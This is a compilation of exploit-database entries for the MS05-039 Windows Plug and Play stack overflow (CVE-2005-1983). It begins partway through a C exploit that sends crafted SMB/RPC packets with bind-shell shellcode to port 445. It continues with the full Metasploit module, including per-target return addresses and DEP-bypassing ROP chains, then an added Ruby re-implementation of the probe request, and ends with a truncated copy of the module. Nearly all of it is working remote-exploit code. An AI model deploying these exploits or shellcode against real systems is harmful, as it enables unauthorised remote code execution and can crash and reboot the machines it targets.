	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
	"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
	"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
	"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
	"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
	"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
	"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";



unsigned char RPC_call[] =
	"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
	"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
	"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
	"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
	"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
	"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
	"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
	"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"

	/* jmp over - entry point */
	"\xEB\x08\x90\x90"

	/* pop reg; pop reg; retn; - umpnpmgr.dll (Spanish build; the original English build used 0x767a1567) */
	"\x67\x15\x77\x76" /* 0x76771567 */

	/* jmp ebx - umpnpmgr.dll (BROKEN)
	"\x6f\x36\x77\x76" */

	"\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


unsigned char RPC_call_end[] =
	"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";


unsigned char bind_shellcode[] =
	"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
	"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
	"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
	"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
	"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
	"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
	"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
	"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
	"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
	"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
	"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
	"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
	"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
	"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
	"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
	"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
	"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
	"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
	"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
	"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
	"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
	"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";

#define SET_PORTBIND_PORT(buf, port) \
	*(unsigned short *)(((buf)+186)) = (port)


void
convert_name(char *out, char *name)
{
	unsigned long len;

	len = strlen(name);
	out += len * 2 - 1;
	while (len--) {
		*out-- = '\x00';
		*out-- = name[len];
	}
}



int
main (int argc, char **argv)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);
#endif

	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	printf("\t         Universal Exploit + no crash shellcode\n\n");
	printf("\t         [Spanish hack by RoMaNSoFt :-)]\n\n\n");
	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		exit(0);
	}

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		exit(0);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '\0', 8);



	printf("\n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed\n");
		exit(0);
	}
	printf("ok\n");

	printf("[*] null session...");
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
	convert_name(ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, packet, ptr-packet, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] bind pipe...");

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] sending crafted packet...");

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = (unsigned short)atoi(argv[2]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, packet, 2196, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}
	printf("ok\n");
	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

	recv(sockfd, recvbuf, 4096, 0);

return 0;
}

// milw0rm.com [2005-08-25]
		

- Exploit entry (EDB-ID 16365)

Microsoft Plug and Play Service Overflow (EDBID:16365)
Platform: windows    Type: dos
Date: 2010-08-30    Verified
Port: 0    Author: metasploit
##
# $Id: ms05_039_pnp.rb 10190 2010-08-30 20:40:05Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Plug and Play Service Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Windows Plug
				and Play service. This vulnerability can be exploited on
				Windows 2000 without a valid user account.

				NOTE: Since the PnP service runs inside the service.exe process, a failed
				exploit attempt will cause the system to automatically reboot.
			},
			'Author'         => [ 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10190 $',
			'References'     =>
				[
					[ 'CVE', '2005-1983' ],
					[ 'OSVDB', '18605' ],
					[ 'BID', '14513' ],
					[ 'MSB', 'MS05-039' ],
					[ 'URL', 'http://www.hsc.fr/ressources/presentations/null_sessions/' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'Compat'   =>
						{
							# -ws2ord XXX?
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
						{
							'Ret'      => 0x767a38f6, # umpnpmgr.dll
						},
					],
					[
						'Windows 2000 SP4 French',
						{
							'Ret'      => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
						},
					],
					[
						'Windows 2000 SP4 Spanish',
						{
							'Ret'      => 0x767738f6, # umpnpmgr.dll
						},
					],
					[
						'Windows 2000 SP4 English/French/German/Dutch',
						{
							'Ret'      => 0x01013C79, # [Pita] [Houmous] <pita@mail.com>
						},
					],
					[
						'Windows 2000 SP0-SP4 German',
						{
							'Ret'      => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>
						},
					],
					[
						'Windows 2000 SP0-SP4 Italian',
						{
							'Ret'      => 0x7677366f, # acaro <acaro@jervus.it>
						},
					],
					[
						'Windows XP SP1 English',
						{
							'Ret'      => 0x758c572a, # pop edi / pop ebx / ret in umpnpmgr.dll v5.1.2600.1106
							'Pipe'     => 'ntsvcs',
							'Offset'   => 16,
						}
					],
					# NOTE: XP SP2, Server 2003 (and SP1) require an Administrator account to access
					# the vulnerable functionality.
					[
						'Windows XP SP2 English (Requires Admin)',
						# SafeSEH enabled, DEP AlwaysOn
						{
							#'Ret'       => 0x41424344,
							'Ret'       => 0x758d2bb3,  # pop eax / ret 0x8
							'Pipe'      => 'ntsvcs',
							'PtrToZero' => 0x758c0170,  # PE data of umpnpmgr.dll v5.1.2600.2180
							'Offset'    => 72,
							'EspOffset' => 108,
							'RopStack'  =>
								# All addresses are from umpnpmgr.dll v5.2.3790.1830
								[
									#
									# Step 1. Allocate an executable heap with HeapCreate
									#
									# Resolve HeapCreate from import
									0x758c1148,            # pointer to HeapCreate import
									0x758c2950,            # mov eax, [eax] / pop ebp / ret 0x8
									0x41414141,            # scratch
									0x41414141,            # scratch
									#0x758da008,            # becomes ebp (something writable)
									0x758da1c8-0xc,        # becomes ebp (writable, used later)

									# Call HeapCreate
									0x758cb728,            # call eax / mov [ebp+0xc],eax / jmp... / mov eax,[ebp+0xc] / pop edi,esi,ebx,ebp / ret 0xc
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x01040110,            # flOptions (gets & with 0x40005)
									0x01010101,
									0x01010101,
									0x758ce552,            # becomes edi - pop edi,esi / ret
									0x758cdd7e,            # becomes esi - pop esi,ebx,ebp / ret 0x4
									0x41414141,            # becomes ebx
									0x41414141,            # becomes ebp

									# Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base
									0x758d45f3,            # or eax,0x8000 / pop ebp / ret 0x4
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # becomes ebp

									# save eax to ebx
									0x758ce0d5,            # push eax / call esi
									0x41414141,            # scratch
									0x758da008+0x18,       # becomes ebp

									# Setup eax to load our saved stack pointer
									0x758d18db,            # pop eax / ret 0xc
									0x41414141,            # scratch
									0x758c524e,            # becomes eax - pop ebp / ret 0x8
									#0x758c2423,            # becomes eax - pop esi,ebp / ret 0x8

									# Store a pointer to the stack to a known address (ebp-0x18), flows to eax after
									0x758c1281,            # mov [ebp-0x18],esp / push eax / mov eax,[ebp-4] / mov [ebp-4],0xffffffff / mov [ebp-8],eax / lea eax,[ebp-0x10] / mov fs:[0],eax / ret
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									#0xcafebabe,            # becomes esi
									0x758da008-0x10,       # becomes ebp

									# Call lstrcpyW to copy shellcode into executable heap
									0x758c542e,            # push [ebp+0x10] / push ebx / call lstrcpyW / push ebx / call edi
									0x41414141,            # scratch
									0x41414141,            # scratch

									# Skip the junk
									0x758c96f6,            # add al,0x3b / ret

									# Call the executable segment!
									0x758c3b62             # call eax
								]
						}
					],
					[
						'Windows Server 2003 SP0 English (Requires Admin)',
						# SafeSEH unsupported, DEP unsupported
						{
							'Ret'       => 0x780df756, # push esp / ret in msvcp60.dll
							'Pipe'      => 'ntsvcs',
							'PtrToZero' => 0x757702c0, # PE data of umpnpmgr.dll
							'Offset'    => 72,
						}
					],
					[
						'Windows Server 2003 SP1 English (Requires Admin)',
						# SafeSEH enabled, DEP AlwaysOn
						{
							'Pipe'      => 'ntsvcs',
							# We will need to bypass DEP!
							#'Ret'       => 0x41424344,
							'Ret'       => 0x757873d5,  # pop eax / ret 0x4
							'PtrToZero' => 0x757702c0,  # PE data of umpnpmgr.dll
							'Offset'    => 72,          # offset to saved eip
							'EspOffset' => 108,         # Offset to where esp ends up pointing
							'RopStack'  =>              # NOTE: 0x41414141 will become random data
								# All addresses are from umpnpmgr.dll v5.2.3790.1830
								[
									#
									# Step 1. Allocate an executable heap with HeapCreate
									#
									# Resolve HeapCreate from import
									0x75771144,            # pointer to HeapCreate import
									0x75772e68,            # mov eax, [eax] / pop ebp / ret
									0x41414141,            # scratch
									0x41414141,            # becomes ebp
									# Call HeapCreate
									0x7578bc37,            # jmp eax
									0x41414141,            # scratch
									0x41414141,            # scratch
									# Save the new heap address in edi
									0x757791d5,            # xchg eax,edi / cmp bh,0xff / ret 0x10
									0x01040110,            # flOptions (gets & with 0x40005)
									0x01010101,
									0x01010101,

									#
									# Step 2. Allocate a buffer using this new heap.
									#
									0x757873d5,            # pop eax / ret 0x4
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									# Resolve HeapAlloc from import
									0x7577115c,            # pointer to HeapAlloc import
									0x75772e68,            # mov eax, [eax] / pop ebp / ret
									0x41414141,            # scratch
									0x41414141,            # becomes ebp
									# Save the address of HeapAlloc in esi
									0x75777ae0,            # xchg eax,esi / mov dl,0xff / dec ecx / ret
									0x41414141,            # scratch
									0x41414141,            # scratch
									# Call HeapAlloc
									0x7578bb6b,            # push edi / call esi / pop edi,esi,ebp / ret
									0xffffffff,            # flags
									0x00010001,            # allocation size
									0x0101018d,            # becomes edi / first byte stored
									0x7577835c,            # becomes esi - pop esi / pop ebx / ret
									0x757830c3,            # becomes ebp/eip - pop esi / ret

									#
									# Step 3. Save the heap address into ebx
									#
									0x7578308f,            # push eax / mov [0x7578d8e0],edi / mov [0x7578d39c],edi / call esi
									0x41414141,            # scratch
									# Put heap address in edi
									0x757791d5,            # xchg eax,edi / cmp bh,0xff / ret 0x10

									#
									# Step 4. Write stub:
									#
									# metasm > lea esi,[esp+4]; _start: lodsb; test al,al; jz _out; stosb; _end: jmp _start; _out:
									# "\x8d\x74\x24\x04\xac\x84\xc0\x74\x03\xaa\xeb\xf8"
									#
									# Store the first byte.
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010174,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010124,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010104,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101ac,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010184,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101c0,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010174,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x01010103,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101aa,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101eb,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch
									# Store another byte!
									0x757873d5,            # pop eax / ret 0x4
									0x010101f8,            # next byte to write
									0x7578be14,            # stosb / ret
									0x41414141,            # scratch

									#
									# Step 5. Finally, call our executable heap buffer.
									#
									0x75783efe             # call ebx
								]
						}
					]
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Aug 9 2005'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
			], self.class)

	end

	def pnp_probe(req, pipe = datastore['SMBPIPE'])

		print_status("Connecting to the SMB service...")
		begin
			connect()
			smb_login()
		rescue ::Exception => e
			# Without an SMB session there is nothing to bind the PNP interface to,
			# so abort the probe here instead of failing later inside dcerpc_bind.
			print_error("Error: #{e.class} #{e}")
			return false
		end

		handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		# CS_DES
		cs_des =
			NDR.long(0) + # CSD_SignatureLength
			NDR.long(0) + # CSD_LegacyDataOffset
			NDR.long(req.length) + # CSD_LegacyDataSize
			NDR.long(0) + # CSD_Flags
			rand_text(16) + # GUID
			req # CSD_LegacyData

		# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);

		# ResourceName:
		stubdata =
			NDR.UnicodeConformantVaryingString("a\\b\\c") +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
			NDR.long(0xffff) +                               # ResourceID: ResType_ClassSpecific
			NDR.UniConformantArray(cs_des) +                 # Resource (our CS_DES structure)
			NDR.long(cs_des.length) +                        # ResourceLen
			NDR.long(4) +                                    # OutputLen (at least 4)
			NDR.long(0)                                      # Flags

		print_status("Calling the vulnerable function...")

		begin
			# Opnum 0x36 on the PNP interface bound above is PNP_QueryResConfList
			dcerpc.call(0x36, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			print_status('Server did not respond, this is expected')
		rescue => e
			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
				print_status('Server disconnected, this is expected')
			else
				raise e
			end
		end

		# Cleanup
		disconnect

		if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil and
				dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
			return true
		else
			return false
		end
	end

	def check
		if (pnp_probe('A'))
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		# If PtrToZero is set, we use saved-ret-overwrite instead of SEH.
		if target['PtrToZero'] then
			eip_off = target['Offset']
			nul_off = eip_off + 8

			# DEP Bypass version (2003 SP1)
			if target['RopStack']
				esp_off = target['EspOffset']

				# Start with a randomized base buffer
				rop_length = target['RopStack'].length * 4
				print_status("ROP Data is %u bytes" % rop_length)
				buf = rand_text(esp_off + rop_length)

				# Put the rest of the stack data at where esp ends up...
				target['RopStack'].each_with_index { |el,idx|
					if el != 0x41414141
						buf[esp_off + (idx*4), 4] = [el].pack('V')
					end
				}
			else
				# Start with a randomized base buffer
				buf = rand_text(nul_off)
			end

			# This becomes EIP
			buf[eip_off,4] = [target.ret].pack('V')

			# Pointer to NULL (4 zero bytes)
			buf[nul_off,4] = [target['PtrToZero']].pack('V')
		else
			# Pad the string up to reach our SEH frame
			buf = rand_text(target['Offset'] ? target['Offset'] : 56)

			# Jump over the address and our invalid pointer to the payload
			buf << Rex::Arch::X86.jmp_short('$+32')
			buf << rand_text(2)

			# The SEH handler pointer
			buf << [target.ret].pack('V')

			# Some padding to reach the next pointer
			buf << rand_text(20)

			# ResourceName - cause access violation on RtlInitUnicodeString
			buf << rand_text(3) + "\xff"
		end

		# Append the encoded payload and we are good to go!
		buf << payload.encoded

		# Determine which pipe to use
		pipe = target['Pipe'] ? target['Pipe'] :  datastore['SMBPIPE']

		pnp_probe(buf, pipe)

		print_status('The server should have executed our payload')

		handler
	end

end
		

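The request that pnp_probe marshals, and the 12-byte response that check() compares against, are easier to follow outside the framework. The following is an added example (it is not part of the Metasploit module and uses none of Rex's NDR helpers): it re-implements the CS_DES and PNP_QueryResConfList stub layout with plain pack calls and decodes the response that the check treats as the vulnerable fingerprint. The byte layouts of the three NDR helpers (long, conformant-varying Unicode string, conformant array), the all-zero GUID default, and the reading of the trailing 0x1a as the CONFIGRET value CR_BUFFER_SMALL are this example's own assumptions about the wire format, not something the module states.

```ruby
# Added example, not part of the Metasploit module above. Dependency-free
# re-implementation of the request pnp_probe builds and a decoder for the
# response check() compares against. NDR layouts below are assumptions.
module PnpProbe
  OPNUM_QUERY_RES_CONF_LIST = 0x36     # dcerpc.call(0x36, ...) in the module
  RES_TYPE_CLASS_SPECIFIC   = 0xffff   # ResourceID used by the module
  CR_BUFFER_SMALL           = 0x1a     # assumed CONFIGRET name for the 0x1a the check expects

  # NDR "long": 32-bit little-endian unsigned integer.
  def self.long(v)
    [v].pack('V')
  end

  # Pad a byte string to a 4-byte boundary with NUL bytes (NDR alignment).
  def self.align4(s)
    s.b + ("\x00" * ((4 - s.bytesize % 4) % 4)).b
  end

  # Assumed layout of a conformant+varying UTF-16LE string: max count,
  # offset, actual count, then the characters including the NUL, aligned.
  def self.unicode_conformant_varying_string(str)
    wide = (str + "\x00").encode('UTF-16LE').b
    n = wide.bytesize / 2
    align4(long(n) + long(0) + long(n) + wide)
  end

  # Assumed layout of a uni-dimensional conformant array: count, bytes, aligned.
  def self.uni_conformant_array(data)
    align4(long(data.bytesize) + data.b)
  end

  # CS_DES exactly as pnp_probe lays it out; CSD_LegacyDataSize follows the
  # probe/payload length, so the payload is what ends up in the legacy data.
  def self.cs_des(legacy_data, guid: ("\x00" * 16).b)
    data = legacy_data.b
    long(0) +                      # CSD_SignatureLength
      long(0) +                    # CSD_LegacyDataOffset
      long(data.bytesize) +        # CSD_LegacyDataSize
      long(0) +                    # CSD_Flags
      guid.b +                     # 16-byte GUID (module uses random bytes)
      data                         # CSD_LegacyData
  end

  # Stub data for PNP_QueryResConfList, same field order as pnp_probe.
  def self.query_res_conf_list_stub(legacy_data, resource_name: "a\\b\\c")
    des = cs_des(legacy_data)
    unicode_conformant_varying_string(resource_name) +  # ResourceName
      long(RES_TYPE_CLASS_SPECIFIC) +                   # ResourceID
      uni_conformant_array(des) +                       # Resource (CS_DES)
      long(des.bytesize) +                              # ResourceLen
      long(4) +                                         # OutputLen
      long(0)                                           # Flags
  end

  # Decode the response stub: conformant array holding the output buffer
  # (count, bytes, alignment padding) followed by the CONFIGRET return value.
  def self.parse_response(stub)
    stub = stub.b
    raise ArgumentError, 'short response stub' if stub.bytesize < 4
    count = stub[0, 4].unpack('V').first
    pad = (4 - count % 4) % 4
    raise ArgumentError, 'truncated response' if stub.bytesize < 4 + count + pad + 4
    { output: stub[4, count],
      configret: stub[4 + count + pad, 4].unpack('V').first }
  end

  # What check() relies on: a zeroed 4-byte output buffer plus CR_BUFFER_SMALL.
  # Anything else (other status, no data, truncated stub) is treated as safe.
  def self.vulnerable_response?(stub)
    r = parse_response(stub)
    r[:output] == ("\x00" * 4).b && r[:configret] == CR_BUFFER_SMALL
  rescue ArgumentError
    false
  end
end
```

For the one-byte probe that check() sends, the stub comes to 80 bytes: a 24-byte ResourceName, the ResourceID, a 33-byte CS_DES padded to 40 inside its array, and three trailing longs. Every byte of the exploit buffer beyond the 32-byte CS_DES header travels as CSD_LegacyData, which is why the module only has to control req. The decoder deliberately returns false rather than raising on a short or malformed response, matching the check's behaviour of reporting Safe unless the exact fingerprint comes back.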
- Vulnerability Information (F83078)

Microsoft Plug and Play Service Overflow (PacketStormID:F83078)
2009-11-26 00:00:00
H D Moore, cazz  metasploit.com
exploit,overflow
windows,2k
CVE-2005-1983

This Metasploit module exploits a stack overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the services.exe process, a failed exploit attempt will cause the system to automatically reboot.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB
	

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft Plug and Play Service Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the Windows Plug
				and Play service. This vulnerability can be exploited on
				Windows 2000 without a valid user account. Since the PnP
				service runs inside the services.exe process, a failed
				exploit attempt will cause the system to automatically
				reboot.
			},
			'Author'         => [ 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1983'],
